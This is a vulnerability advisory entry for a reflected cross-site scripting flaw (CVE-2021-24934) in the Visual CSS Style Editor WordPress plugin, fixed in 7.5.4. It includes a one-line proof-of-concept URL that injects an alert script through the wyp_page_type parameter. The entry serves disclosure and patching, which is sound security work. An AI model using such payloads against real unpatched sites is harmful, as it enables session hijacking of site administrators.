Visual CSS Style Editor < 7.5.4 – Reflected Cross-Site Scripting | CVE 2021-24934 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the wyp_page_type parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue

Proof of Concept

https://example.com/wp-admin/admin.php?page=yellow-pencil-editor&href=1&wyp_page_id=home&wyp_page_type=home&wyp_mode=single&wyp_page_type=<script>alert(/XSS/)</script>

Affects Plugins

yellow-pencil-visual-theme-customizer

Fixed in 7.5.4

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2649978

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

ZhongFu Su(JrXnm) of Wuhan University

Submitter

ZhongFu Su(JrXnm) of Wuhan University

Submitter website

https://blog.szfszf.top/

Submitter twitter

Verified

Yes

WPVDB ID

0aa5a8d5-e736-4cd3-abfd-8e0a356bb6ef

Timeline

Publicly Published

2022-01-03 (about 2 years ago)

Added

2022-01-03 (about 2 years ago)

Last Updated

2022-09-26 (about 1 years ago)

Other

Published

Title

Published

2014-08-01

Title

All-in-One Event Calendar 1.9 - wp-admin/post-new.php Multiple Parameter XSS

Published

2024-03-29

Title

Header Image Slider <= 0.3 - Reflected Cross-Site Scripting

Published

2023-05-22

Title

MailChimp Subscribe Forms < 4.0.9.2 - Admin+ Stored XSS

Published

2024-03-29

Title

Custom Field Bulk Editor <= 1.9.1 - Reflected Cross-Site Scripting

Published

2015-04-26

Title

FeedWordPress <= 2015.0426 - Cross-Site Scripting (XSS)